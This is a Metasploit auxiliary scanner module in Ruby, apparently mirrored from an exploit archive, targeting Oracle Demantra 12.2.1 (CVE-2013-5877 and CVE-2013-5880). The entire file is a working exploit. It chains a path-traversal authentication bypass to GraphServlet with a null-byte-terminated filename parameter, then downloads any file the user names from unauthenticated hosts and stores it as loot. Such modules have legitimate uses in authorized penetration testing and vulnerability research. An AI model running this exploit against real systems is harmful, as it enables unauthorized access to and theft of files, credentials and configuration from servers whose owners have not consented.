## https://sploitus.com/exploit?id=PACKETSTORM:181016
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',
'Description' => %q{
This module exploits a file download vulnerability found in Oracle
Demantra 12.2.1 in combination with an authentication bypass. By
combining these exposures, an unauthenticated user can retrieve any file
on the system by referencing the full file path to any file a vulnerable
machine.
},
'References' =>
[
[ 'CVE', '2013-5877'],
[ 'CVE', '2013-5880'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']
],
'Author' =>
[
'Oliver Gruskovnjak'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-28'
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [false, 'Use SSL', false]),
OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"
res = send_request_cgi({
'uri' => normalize_uri(authbypass),
'method' => 'POST',
'encode_params' => false,
'vars_post' => {
'filename' => "#{filename}%00"
}
})
if res.nil? or res.body.empty?
fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")
end
if res.code == 404
print_error("#{rhost}:#{rport} - File not found")
return
end
if res.code == 200
print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'oracle.demantra',
'application/octet-stream',
ip,
res.body,
fname)
print_good("#{ip}:#{rport} - File saved in: #{path}")
end
end
end